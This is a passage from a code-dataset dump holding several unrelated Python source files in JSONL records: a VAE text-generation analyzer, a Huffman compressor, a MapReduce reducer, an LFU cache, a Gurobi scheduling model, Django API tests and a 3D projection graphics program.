_run(\"relativistic_monte_carlo_logpdf\")\n","repo_name":"MFreidank/ARSpy","sub_path":"arspy/tests/test_ars.py","file_name":"test_ars.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"13939216358","text":"import json\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport os\n\nimport sys\nsys.path.append(\".\")\n\nfrom data.data_reddit import REDDIT\nfrom modules.vaeseq import VAESEQ\nfrom config import args\nfrom measures import evaluation_utils\n\ndef main():\n ## CUDA\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.cuda)\n\n ## Parameters\n if args.exp == \"NONE\":\n args.exp = args.graph_type\n \n exp_path = \"./saved/\"+args.exp+\"/\"\n args.data_len = 20000\n print(args)\n\n ## DataLoader\n dataloader = REDDIT(batch_size=args.batch_size, vocab_limit=args.vocab_limit, max_input_len=args.enc_max_len, max_output_len=args.dec_max_len)\n params = {\n 'vocab_size': len(dataloader.word2idx),\n 'word2idx': dataloader.word2idx,\n 'idx2word': dataloader.idx2word,\n 'loss_type': args.loss_type,\n 'graph_type': args.graph_type}\n print('Vocab Size:', params['vocab_size'])\n\n ## ModelInit \n model = VAESEQ(params)\n\n ## Session\n # load some parameters\n variables = tf.contrib.framework.get_variables_to_restore()\n print(len(variables), end=\",\")\n variables = [v for v in variables if \"optimizer\" not in v.name]\n # for v in variables_to_resotre:\n # print(type(v.name), v.name)\n print(len(variables))\n # end load\n saver = tf.train.Saver(variables)\n # saver = tf.train.Saver()\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth=True\n with tf.Session(config=config) as sess:\n sess.run(tf.global_variables_initializer())\n\n restore_path = tf.train.latest_checkpoint(exp_path)\n saver.restore(sess, restore_path)\n saver = tf.train.Saver() # new saver\n print(\"Model restore from file: %s\" % (restore_path))\n \n # Parpear Dir\n ref_file = exp_path+\"test.input.txt\"\n trans_file = exp_path+\"test.output.txt\"\n result_file = exp_path+\"test.\"+restore_path.split(\"-\")[-1]+\".decoder.result.txt\"\n test_file = \"./corpus/reddit/test.txt\"\n\n # Test Dir\n dataloader.trans_in_ref(finpath=test_file, foutpath=ref_file)\n with open(trans_file, \"w\") as f:\n f.write(\"\")\n print(\"[PAEPEAR DATASET]\")\n\n # Test DataSet\n test_len = 20000\n batcher = dataloader.load_data(fpath=test_file)\n for _ in tqdm(range((test_len-1)//args.batch_size+1)):\n try:\n x_enc_inp, _, _, y_enc_inp, _, _ = next(batcher)\n # dec_inp = dataloader.update_word_dropout(dec_inp_full)\n except StopIteration:\n print(\"there are no more examples\")\n break\n # print(\"x_enc_inp:\", x_enc_inp)\n # print(\"y_enc_inp:\", y_enc_inp)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n print(\"-----------------\")\n model_test = model.decoder_model\n predict_z_one = model_test.point_reconstruct(sess, \"have fun\")\n predict_z_two = model_test.point_reconstruct(sess, \"thank you very much\")\n print(\"-----------------\")\n beta = 0.8\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n beta = 0.6\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n beta = 0.4\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n beta = 0.2\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n break\n\n\nif __name__ == '__main__':\n print(json.dumps(args.__dict__, indent=4))\n main()","repo_name":"xzhren/VAE2Seq","sub_path":"measures/analyzer_vae.py","file_name":"analyzer_vae.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41967283923","text":"\"\"\"\n Christina Trotter\n CSCI 533\n 11/29/2017\n\n This file contains the functions used to compress a given file\n\"\"\"\n\nimport bitstring as bs, huff_heap as h\n\nNUMBITS = 8\n\ndef compress(f):\n b,s = encrypt(f), ''\n for l in b:\n s = s + l\n r = len(s) % NUMBITS\n fill_num = NUMBITS - r\n s = s.ljust(len(s) + fill_num,'0')\n bits = bs.BitArray(bin=s)\n byte = bits.tobytes()\n return byte\n\ndef encrypt(f):\n f = f.split('\\n')\n bits = []\n for line in f:\n chars = list(line)\n bits.append(encrypt_helper(chars))\n bits.append(get_special_bits('EOF'))\n\n return bits\n\ndef get_charbits(c):\n if len(h.heap) < 3:\n return ''\n s = ''\n if c in h.heap[1][1]:\n s = bit_helper(h.heap[1],c,'')\n elif c in h.heap[2][1]:\n s = bit_helper(h.heap[2],c,'')\n s = remove_nones(s)\n return s\n\ndef get_special_bits(c):\n a,p,s = 1,0,''\n\n while a is not h.NO_CHILD:\n p = a\n s = s + str(h.heap[a][3])\n a,b = h.get_children(h.heap,h.heap[a])\n\n if c == h.heap[p-1][1]:\n s = s[:-1] + str(h.heap[p-1][3])\n\n return s\n\ndef bit_helper(x,c,s):\n s = s + str(x[3])\n if c == x[1]:\n return s\n if c in x[1]:\n a,b = h.get_children(h.heap,x)\n return bit_helper(h.heap[a],c,s), bit_helper(h.heap[b],c,s)\n return\n\ndef encrypt_helper(ch):\n bit_str = ''\n for c in ch:\n if c.isalpha() or c == ' ':\n bit_str = bit_str + get_charbits(c.upper())\n bit_str = bit_str + get_special_bits('EOL')\n return bit_str\n\ndef remove_nones(x):\n inf = False\n while isinstance(x, tuple) and not inf:\n inf = True\n for y in x:\n if y is not None:\n x = y\n inf = False\n return x\n","repo_name":"ninaaj/Huffman","sub_path":"huff_comp.py","file_name":"huff_comp.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74207196110","text":"#!/usr/bin/env python\nimport sys\n\n# Initialize variables to store matrix data and the vector\nmatrix_data = {}\nvector = {}\n\n# Reducer function\ndef reducer():\n for line in sys.stdin:\n line = line.strip()\n parts = line.split(',')\n \n if len(parts) == 4:\n row, matrix_id, col, value = parts\n row, col, value = int(row), int(col), int(value)\n \n if matrix_id == 'A':\n if row not in matrix_data:\n matrix_data[row] = {}\n matrix_data[row][col] = value\n elif matrix_id == 'B':\n vector[row] = value\n\n # Perform matrix-vector multiplication and emit the results\n for row, matrix_row in matrix_data.items():\n result = sum(matrix_row[col] * vector[col] for col in matrix_row)\n print('{}\\tA,{},{}'.format(row, row, result))\n\nif __name__ == \"__main__\":\n reducer()\n\n","repo_name":"tankisank/lab","sub_path":"big-data-analytics-lab-main/reducer_2.py","file_name":"reducer_2.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15756031524","text":"from collections import OrderedDict\n\n\n\"\"\"\nGeneral design.\nI am using a hash table to set the keys and values,\nthen I am using another hash table that has all the frequencies as keys and values as\nordered linked lists.\nWhat's the criteria for eliminating new elements?\n1. frequencies, least used will be eleminated first\n2. If there is a tie then recently used keys have higher priority to conserve.\n\"\"\"\n\n\n\n\nclass LFUCache:\n def __init__(self, capacity: int):\n self.cap = capacity\n self.size = 0\n \n # main record key:(value, freq)\n self.keys = {} \n \n # backup record freq:dll\n self.frequencies = OrderedDict()\n \n # Set the first legal frequency, 1.\n self.frequencies[1] = OrderedDict()\n\n \n \n def get(self, key: int) -> int:\n \n if key not in self.keys:\n return -1\n \n item = self.keys[key]\n \n value = item[0]\n freq = item[1]\n self.updateKey(key, value)\n \n\n \n return value\n \n \n \n def put(self, key: int, value: int) -> None:\n if key in self.keys:\n self.updateKey(key, value)\n return\n \n self.size += 1\n \n if self.size > self.cap and self.cap > 0:\n self.popCache()\n elif self.cap == 0:\n return\n \n self.keys[key] = (value, 1)\n \n if 1 not in self.frequencies:\n self.frequencies[1] = OrderedDict()\n \n firstFreqList = self.frequencies[1]\n \n \n \n firstFreqList[key] = (value, 1)\n firstFreqList.move_to_end(key, last=False)\n \n \n \n \n \n # updating my key\n def updateKey(self, key, newValue):\n item = self.keys[key]\n freq = item[1]\n newFreq = freq + 1\n \n self.removeFromDict(freq, key)\n \n if newFreq not in self.frequencies:\n self.frequencies[newFreq] = OrderedDict()\n \n freqList = self.frequencies[newFreq]\n #update the new frequency\n freqList[key] = (newValue, newFreq)\n \n # move to first\n freqList.move_to_end(key, last=False)\n \n # update the main hash\n self.keys[key] = (newValue, newFreq)\n #print(f'{key} should now be in the new freq {newFreq} with a value of {newValue}: {freqList}')\n return\n\n \n # removes the last item in the whole cache\n def popCache(self):\n \n lowFreq = min( _ for _ in self.frequencies.keys())\n \n # get the last item of the list\n item = self.frequencies[lowFreq].popitem()\n key = item[0]\n \n #print(f'Popping {key} from freq {lowFreq}')\n \n # remove the frequency if empty\n if len(self.frequencies[lowFreq]) == 0:\n del self.frequencies[lowFreq]\n \n # remove item from the main dictionary\n del self.keys[key]\n \n self.size -= 1\n return\n \n \n\n # removes an item only from the ordered list it is set to\n def removeFromDict(self, freq, key):\n # remove key from frequency list\n del self.frequencies[freq][key]\n \n # if frequency list is empty we remove it.\n if len(self.frequencies[freq]) == 0:\n del self.frequencies[freq]\n\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"AlanFGC/Leetcode-Hero","sub_path":"460-lfu-cache/460-lfu-cache.py","file_name":"460-lfu-cache.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12298324429","text":"import numpy as np\nimport gurobipy as grb\nfrom gurobipy import GRB\n\n\ndef build_model(data, with_epsilon_constraint=False):\n model = grb.Model()\n\n worker_length = len(data[\"staff\"]) # Number of workers\n job_length = len(data[\"jobs\"]) # Number of jobs\n skill_length = len(data[\"qualifications\"]) # Number of skills\n day_length = data[\"horizon\"] # Number of days\n\n # Define jobs parameters\n gains_job = np.array([job[\"gain\"] for job in data[\"jobs\"]])\n penalties_job = np.array([job[\"daily_penalty\"] for job in data[\"jobs\"]])\n due_dates_job = np.array([job[\"due_date\"] for job in data[\"jobs\"]])\n work_days_job_skill = np.array(\n [\n [\n job[\"working_days_per_qualification\"][skill]\n if skill in job[\"working_days_per_qualification\"]\n else 0\n for skill in data[\"qualifications\"]\n ]\n for job in data[\"jobs\"]\n ]\n )\n\n # Define staff parameters\n qualifications_worker_skill = np.array(\n [\n [\n 1 if skill in worker[\"qualifications\"] else 0\n for skill in data[\"qualifications\"]\n ]\n for worker in data[\"staff\"]\n ]\n )\n vacations_worker_day = np.array(\n [\n [1 if 1 + day in worker[\"vacations\"] else 0 for day in range(day_length)]\n for worker in data[\"staff\"]\n ]\n )\n\n ## DECISION VARIABLES ##\n\n # 4-D array of binary variables : 1 if a worker is assigned to a certain project for a certain skill on a certain day, else 0\n works_worker_job_skill_day = model.addVars(\n worker_length,\n job_length,\n skill_length,\n day_length,\n vtype=GRB.BINARY,\n name=\"work\",\n )\n\n is_realized_job = model.addVars(\n job_length, vtype=GRB.BINARY, name=\"is_realized\"\n ) # 1 if a job is realized, else 0\n\n started_after_job_day = model.addVars(\n job_length, day_length, vtype=GRB.BINARY, name=\"started_after\"\n ) # 1 if a job is started after a certain day, else 0\n finished_before_job_day = model.addVars(\n job_length, day_length, vtype=GRB.BINARY, name=\"finished_before\"\n ) # 1 if a job is finished before a certain day, else 0\n max_duration = model.addVar(\n vtype=GRB.INTEGER, name=\"max_duration\"\n ) # Integer that represents the maximum duration for any job\n\n is_assigned_worker_job = model.addVars(\n worker_length, job_length, vtype=GRB.BINARY, name=\"is_assigned\"\n ) # 1 if a certain worker is assigned on a certain job, else 0\n max_assigned = model.addVar(\n vtype=GRB.INTEGER, name=\"max_assigned\"\n ) # Integer that represents the maximum number of assigned jobs for any worker\n\n model = add_constraints(\n model,\n worker_length,\n job_length,\n skill_length,\n day_length,\n work_days_job_skill,\n qualifications_worker_skill,\n vacations_worker_day,\n works_worker_job_skill_day,\n is_realized_job,\n started_after_job_day,\n finished_before_job_day,\n max_duration,\n is_assigned_worker_job,\n max_assigned,\n )\n\n model = add_objective(\n model,\n job_length,\n day_length,\n gains_job,\n penalties_job,\n due_dates_job,\n is_realized_job,\n finished_before_job_day,\n max_duration,\n max_assigned,\n with_epsilon_constraint,\n )\n\n return model\n\n\ndef add_constraints(\n model,\n worker_length,\n job_length,\n skill_length,\n day_length,\n work_days_job_skill,\n qualifications_worker_skill,\n vacations_worker_day,\n works_worker_job_skill_day,\n is_realized_job,\n started_after_job_day,\n finished_before_job_day,\n max_duration,\n is_assigned_worker_job,\n max_assigned,\n):\n\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= qualifications_worker_skill[worker, skill]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"qualification\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n works_worker_job_skill_day[worker, job, skill, day]\n for job in range(job_length)\n for skill in range(skill_length)\n )\n <= 1 - vacations_worker_day[worker, day]\n for worker in range(worker_length)\n for day in range(day_length)\n ),\n name=\"vacation\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n works_worker_job_skill_day[worker, job, skill, day]\n for worker in range(worker_length)\n for day in range(day_length)\n )\n == is_realized_job[job] * work_days_job_skill[job, skill]\n for job in range(job_length)\n for skill in range(skill_length)\n ),\n name=\"job_coverage\",\n )\n\n # started_after == 0 => works == 0\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= started_after_job_day[job, day]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"started_after\",\n )\n # increasing sequence\n model.addConstrs(\n (\n started_after_job_day[job, day] <= started_after_job_day[job, day + 1]\n for job in range(job_length)\n for day in range(day_length - 1)\n ),\n name=\"started_after_increasing\",\n )\n # is_realized_job == 0 => started_after == 1\n model.addConstrs(\n (\n 1 - started_after_job_day[job, day] <= is_realized_job[job]\n for job in range(job_length)\n for day in range(day_length)\n ),\n name=\"started_after_not_realized\",\n )\n\n # finished before == 1 => works == 0\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= 1 - finished_before_job_day[job, day]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"finished_before\",\n )\n # increasing sequence\n model.addConstrs(\n (\n finished_before_job_day[job, day] <= finished_before_job_day[job, day + 1]\n for job in range(job_length)\n for day in range(day_length - 1)\n ),\n name=\"finished_before_increasing\",\n )\n # is_realized_job == 0 => finished_before == 1\n model.addConstrs(\n (\n 1 - finished_before_job_day[job, day] <= is_realized_job[job]\n for job in range(job_length)\n for day in range(day_length)\n ),\n name=\"finished_before_not_realized\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n started_after_job_day[job, day] - finished_before_job_day[job, day]\n for day in range(day_length)\n )\n <= max_duration\n for job in range(job_length)\n ),\n name=\"max_duration\",\n )\n\n # exists_skill_day works == 1 => is_assigned == 1\n model.addConstrs(\n (\n works_worker_job_skill_day[worker, job, skill, day]\n <= is_assigned_worker_job[worker, job]\n for worker in range(worker_length)\n for job in range(job_length)\n for skill in range(skill_length)\n for day in range(day_length)\n ),\n name=\"is_assigned_worker_job\",\n )\n # forall_skill_day works == 0 => is_assigned == 0\n model.addConstrs(\n (\n is_assigned_worker_job[worker, job]\n <= grb.quicksum(\n works_worker_job_skill_day[worker, job, skill, day]\n for skill in range(skill_length)\n for day in range(day_length)\n )\n for worker in range(worker_length)\n for job in range(job_length)\n ),\n name=\"is_assigned_worker_job_bis\",\n )\n\n model.addConstrs(\n (\n grb.quicksum(\n is_assigned_worker_job[worker, job] for job in range(job_length)\n )\n <= max_assigned\n for worker in range(worker_length)\n ),\n name=\"max_assigned\",\n )\n\n return model\n\n\ndef add_objective(\n model,\n job_length,\n day_length,\n gains_job,\n penalties_job,\n due_dates_job,\n is_realized_job,\n finished_before_job_day,\n max_duration,\n max_assigned,\n with_epsilon_constraint,\n):\n if not with_epsilon_constraint:\n # Add primary objective\n model.ModelSense = GRB.MAXIMIZE\n model.setObjectiveN(\n grb.quicksum(\n gains_job[job] * is_realized_job[job]\n - penalties_job[job]\n * grb.quicksum(\n 1 - finished_before_job_day[job, day]\n for day in range(due_dates_job[job], day_length)\n )\n for job in range(job_length)\n ),\n 0,\n priority=2,\n )\n # Add multi-objective functions\n model.setObjectiveN(\n -max_assigned,\n 1,\n priority=1,\n )\n model.setObjectiveN(\n -max_duration,\n 2,\n priority=0,\n )\n else:\n # Add primary objective\n model.setObjective(\n grb.quicksum(\n gains_job[job] * is_realized_job[job]\n - penalties_job[job]\n * grb.quicksum(\n 1 - finished_before_job_day[job, day]\n for day in range(due_dates_job[job], day_length)\n )\n for job in range(job_length)\n )\n - 0.005 * max_assigned\n - 0.001 * max_duration,\n sense=GRB.MAXIMIZE,\n )\n\n return model\n","repo_name":"GuillaumeDugat/CompuOpti","sub_path":"src/build_model.py","file_name":"build_model.py","file_ext":"py","file_size_in_byte":10186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34859701524","text":"#encoding: utf-8\n\n# portal from: https://data.statmt.org/wmt18/translation-task/preprocessed/zh-en/deseg.py\n\nimport sys\n\nfrom utils.fmt.base import sys_open\nfrom utils.fmt.lang.zh.deseg import deseg as map_func\n\ndef handle(srcf, rsf):\n\n\tens = \"\\n\".encode(\"utf-8\")\n\twith sys_open(srcf, \"rb\") as frd, sys_open(rsf, \"wb\") as fwrt:\n\t\tfor _ in frd:\n\t\t\tfwrt.write(map_func(_.decode(\"utf-8\").rstrip(\"\\r\\n\")).encode(\"utf-8\"))\n\t\t\tfwrt.write(ens)\n\nif __name__ == \"__main__\":\n\thandle(sys.argv[1], sys.argv[2])\n","repo_name":"hfxunlp/transformer","sub_path":"tools/lang/zh/deseg.py","file_name":"deseg.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"83"} +{"seq_id":"8131724168","text":"\"\"\"\r\nconvert list of row tuples to list of row dicts with field name keys\r\nthis is not a command-line utility: hardcoded self-test if run\r\n\"\"\"\r\n\r\ndef makedicts(cursor, query, params=()):\r\n cursor.execute(query, params)\r\n colnames = [desc[0] for desc in cursor.description]\r\n rowdicts = [dict(zip(colnames, row)) for row in cursor.fetchall()]\r\n return rowdicts\r\n\r\nif __name__ == '__main__': # self test\r\n import sqlite3\r\n conn = sqlite3.connect('dbase1')\r\n cursor = conn.cursor()\r\n query = 'select name, pay from people where pay < ?'\r\n lowpay = makedicts(cursor, query, [70000])\r\n for rec in lowpay: print(rec)\r\n","repo_name":"muxuezi/pp4p","sub_path":"PP4E/Dbase/Sql/makedicts.py","file_name":"makedicts.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"83"} +{"seq_id":"32497139080","text":"from django.urls import reverse\nfrom django.test import TestCase\nfrom rest_framework import status\nfrom Space.models import Satelite\nfrom rest_framework.test import APIClient\n\nSATELITE_URLS = {\n 'create': reverse('space_list'),\n 'list': reverse('space_list'),\n\n}\nTOPSECRET_URLS = {\n 'post': reverse('topsecret')\n}\nTOPSECRET_SPLITS_URLS = {\n 'post' : reverse('topsecret_post')\n}\nclass SateliteApiTest(TestCase):\n \"\"\"TaskApiTest\n\n Test cases for Task object\n \"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_create_satelite_notsuccessful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns:\n\n If the satellite is not successfully created then status 400\n \"\"\"\n satelite = {\n 'latitude': 23.5485,\n 'longitude': 23.5485\n }\n response = self.client.post(SATELITE_URLS['create'], satelite)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_create_satelite_successful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns:\n\n If the satellite was successfully created then status 200\n \"\"\"\n satelite = {\n 'name': \"Arsat\",\n 'latitude': 23.5485,\n 'longitude': 33.5944\n }\n response = self.client.post(SATELITE_URLS['create'], satelite)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_top_secret_fails(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: A new secret message is sent, which cannot be decrypted then status 404\n \"\"\"\n satelite = {\n 'name': \"Arsat\",\n 'latitude': -500,\n 'longitude': -200\n }\n satelite1 = {\n 'name': \"Arsat1\",\n 'latitude': 100,\n 'longitude': -100\n }\n satelite2 = {\n 'name': \"Arsat2\",\n 'latitude': 500,\n 'longitude': 100\n }\n data = {\n \"satelites\":[\n {\n \"name\":\"Arsat\",\n \"message\":[\"\", \"\", \"\", \"\", \"mensaje\", \"\"],\n \"distance\": 100.0\n },\n {\n \"name\":\"Arsat1\",\n \"message\":[\"\", \"\", \"un\", \"\", \"secreto\"],\n \"distance\": 115.5\n },\n\n ]\n\n }\n self.client.post(SATELITE_URLS['create'], satelite)\n self.client.post(SATELITE_URLS['create'], satelite1)\n self.client.post(SATELITE_URLS['create'], satelite2)\n response = self.client.post(TOPSECRET_URLS['post'], data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_top_secret_successful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: A new secret message is sent, which could be deciphered then status 200\n \"\"\"\n\n satelite = {\n 'name': \"Arsat\",\n 'latitude': -500,\n 'longitude': -200\n }\n satelite1 = {\n 'name': \"Arsat1\",\n 'latitude': 100,\n 'longitude': -100\n }\n satelite2 = {\n 'name': \"Arsat2\",\n 'latitude': 500,\n 'longitude': 100\n }\n data = {\n \"satelites\":[\n {\n \"name\":\"Arsat\",\n \"message\":[\"\", \"este\", \"\", \"\", \"mensaje\", \"\"],\n \"distance\": 100.0\n },\n {\n \"name\":\"Arsat1\",\n \"message\":[\"este\", \"\", \"un\", \"mensaje\", \"secreto\"],\n \"distance\": 115.5\n },\n {\n \"name\":\"Arsat2\",\n \"message\":[ \"\", \"es\", \"\", \"mensaje\"],\n \"distance\":142.7\n\n }\n ]\n\n }\n self.client.post(SATELITE_URLS['create'], satelite)\n self.client.post(SATELITE_URLS['create'], satelite1)\n self.client.post(SATELITE_URLS['create'], satelite2)\n response = self.client.post(TOPSECRET_URLS['post'], data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_top_secret_split_fails(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: You want to update the satellite but information is missing then status 404\n \"\"\"\n data_succes = {\n 'name': \"Arsat\",\n 'latitude': 23.5485,\n 'longitude': 33.5944\n }\n data_fails = {\n \"name\": \"Arsat\",\n \"distance\": 100.0\n }\n self.client.post(SATELITE_URLS['create'], data_succes)\n response = self.client.post(TOPSECRET_SPLITS_URLS['post'], data_fails, format='json')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_top_secret_split_successful(self):\n \"\"\"Create a Satelite successfully.\n\n Returns: You want to update the satellite successfully then status 200\n \"\"\"\n satelite = {\n 'name': \"Arsat\",\n 'latitude': 23.5485,\n 'longitude': 33.5944\n }\n data_succes = {\n \"name\": \"Arsat\",\n \"message\": [\"\", \"este\", \"\", \"\", \"mensaje\", \"\"],\n \"distance\": 100.0\n }\n self.client.post(SATELITE_URLS['create'], satelite)\n response = self.client.post(TOPSECRET_SPLITS_URLS['post'], data_succes, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)","repo_name":"agustinmartinez01/quasar","sub_path":"mysite/Space/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13987189820","text":"# Projections\n# Ayush Jain - 2017UCP1168\nwindow = (0,0,0,0)\nviewport = (0,0,0,0)\nfrom graphics import *\nfrom drawLine import plotLine\nimport math\n\ndef matrix_multiply(A,B):\n m = len(A)\n if(type(A[0]) is type(1)) or (type(A[0]) is type(1.5)):\n tmp = []\n for i in range(4):\n x = (A[0]*B[0][i]) + (A[1]*B[1][i]) + (A[2]*B[2][i]) + (A[3]*B[3][i])\n tmp.append(x)\n return tmp\n else:\n n = len(A[0])\n p = len(B[0])\n res = [[0 for j in range(p)] for i in range(m)]\n for i in range(m):\n for j in range(p):\n for k in range(n):\n res[i][j] += A[i][k] * B[k][j]\n return res\n\ndef project_matrix(ref_point,normal,dop):\n (x0,y0,z0) = ref_point\n (n1,n2,n3) = normal\n (a,b,c) = dop\n d0 = (x0*n1) + (y0*n2) + (z0*n3)\n d1 = (a*n1) + (b*n2) + (c*n3)\n mat = [\n [d1-(a*n1) , -b*n1 , -c*n1 , 0],\n [-a*n2 , d1-(b*n2) , -c*n2 , 0],\n [-a*n3 , -b*n3 , d1-(c*n3) , 0],\n [a*d0 , b*d0 , c*d0 , d1]\n ]\n return mat\n\ndef project_matrix_perspective(ref_point,normal,cop):\n (x0,y0,z0) = ref_point\n (n1,n2,n3) = normal\n (a,b,c) = cop\n d0 = (x0*n1) + (y0*n2) + (z0*n3)\n d1 = (a*n1) + (b*n2) + (c*n3)\n alpha = d0 - d1\n mat = [\n [alpha+(n1*a) , n1*b , n1*c , n1],\n [n2*a , alpha+(n2*b) , n2*c , n2],\n [n3*a , n3*b , alpha+(n3*c) , n3],\n [-a*d0 , -b*d0 , -c*d0 , -d1]\n ]\n return mat\n\ndef make_viewplane_xy(ref_point,normal):\n # We transform the viewplane to xy plane by one translation and two rotations\n # So as to display the viewplane on screen\n (x0,y0,z0) = ref_point\n (n1,n2,n3) = normal\n T1 = [\n [1,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [-x0,-y0,-z0,1]\n ]\n l1 = math.sqrt((n1*n1) + (n3*n3))\n cos_alpha = n3/l1\n sin_alpha = -(n1/l1)\n T2 = [\n [cos_alpha,0,-sin_alpha,0],\n [0,1,0,0],\n [sin_alpha,0,cos_alpha,0],\n [0,0,0,1]\n ]\n\n T1 = matrix_multiply(T1,T2)\n D = math.sqrt( (l1*l1) + (n2*n2) )\n cos_phi = l1/D\n sin_phi = n2/D\n T2 = [\n [1,0,0,0],\n [0,cos_phi,sin_phi,0],\n [0,-sin_phi,cos_phi,0],\n [0,0,0,1]\n ]\n T1 = matrix_multiply(T1,T2)\n return T1\n\ndef main():\n global viewport,window\n print(\"Enter length of viewport : \",end=\"\") ; x = int(input())\n print(\"Enter width of viewport : \",end=\"\") ; y = int(input())\n # Notation : viewport = (xv_min,yv_min,xv_max,yv_max)\n viewport = (0,0,x,y)\n win = GraphWin(\"Projections\",x,y)\n win.setBackground(color_rgb(60, 179, 113))\n print(\"Enter xw_min : \",end=\"\") ; xw_min = int(input())\n print(\"Enter yw_min : \",end=\"\") ; yw_min = int(input())\n print(\"Enter xw_max : \",end=\"\") ; xw_max = int(input())\n print(\"Enter yw_max : \",end=\"\") ; yw_max = int(input())\n # Some Sanity Checks for window corners\n if(xw_min>xw_max):\n (xt,yt) = (xw_min,yw_min)\n (xw_min,yw_min) = (xw_max,yw_max)\n (xw_max,yw_max) = (xt,yt)\n if(yw_min>yw_max):\n (yw_min,yw_max) = (yw_max,yw_min)\n win.setCoords(xw_min,yw_min,xw_max,yw_max)\n # Notation : window = (xw_min,yw_min,xw_max,yw_max)\n window = (xw_min,yw_min,xw_max,yw_max)\n # CUBE(SIDE = 300) - 12 Edges, Homogeneous Coordinates\n points = [\n [ [0,300,300,1] , [0,300,0,1] ],\n [ [0,300,0,1] , [300,300,0,1] ],\n [ [300,300,0,1] , [300,300,300,1] ],\n [ [300,300,300,1] , [0,300,300,1] ],\n [ [0,0,300,1] , [0,0,0,1] ],\n [ [0,0,0,1] , [300,0,0,1] ],\n [ [300,0,0,1] , [300,0,300,1] ],\n [ [300,0,300,1] , [0,0,300,1] ],\n [ [0,0,300,1] , [0,300,300,1] ],\n [ [0,0,0,1] , [0,300,0,1] ],\n [ [300,0,300,1] , [300,300,300,1] ],\n [ [300,0,0,1] , [300,300,0,1] ]\n ]\n print(\" 1. Orthographic - Top View\")\n print(\" 2. Orthographic - Front View\")\n print(\" 3. Orthographic - Side View\")\n print(\" 4. Orthographic - Isometric\")\n print(\" 5. Oblique - General Parallel\")\n print(\" 6. General Perspective\")\n choice = int(input(\" Enter choice : \"))\n if(choice == 1):\n p_mat = [\n [1,0,0,0],\n [0,0,0,0],\n [0,0,1,0],\n [0,0,0,1]\n ]\n ref_point = (0,0,0)\n normal = dop = (0,1,0)\n elif(choice == 2):\n p_mat = [\n [1,0,0,0],\n [0,1,0,0],\n [0,0,0,0],\n [0,0,0,1]\n ]\n ref_point = (0,0,0)\n normal = dop = (0,0,1)\n elif(choice == 3):\n p_mat = [\n [0,0,0,0],\n [0,1,0,0],\n [0,0,1,0],\n [0,0,0,1]\n ]\n ref_point = (0,0,0)\n normal = dop = (1,0,0)\n elif(choice == 4):\n print(\"Enter reference point of PP(x space y space z) : \",end='')\n ref_point = tuple(map(int,input().split()))\n normal = dop = (1,1,1)\n p_mat = project_matrix(ref_point,normal,dop)\n elif(choice == 5):\n print(\"Enter reference point of PP(x space y space z) : \",end='')\n ref_point = tuple(map(int,input().split()))\n print(\"Enter normal to the plane(n1 space n2 space n3) : \",end=\"\")\n normal = tuple(map(int,input().split()))\n print(\"Enter the Direction of Projection(a space b space c) : \",end=\"\")\n dop = tuple(map(int,input().split()))\n p_mat = project_matrix(ref_point,normal,dop)\n elif(choice == 6):\n print(\"Enter reference point of PP(x space y space 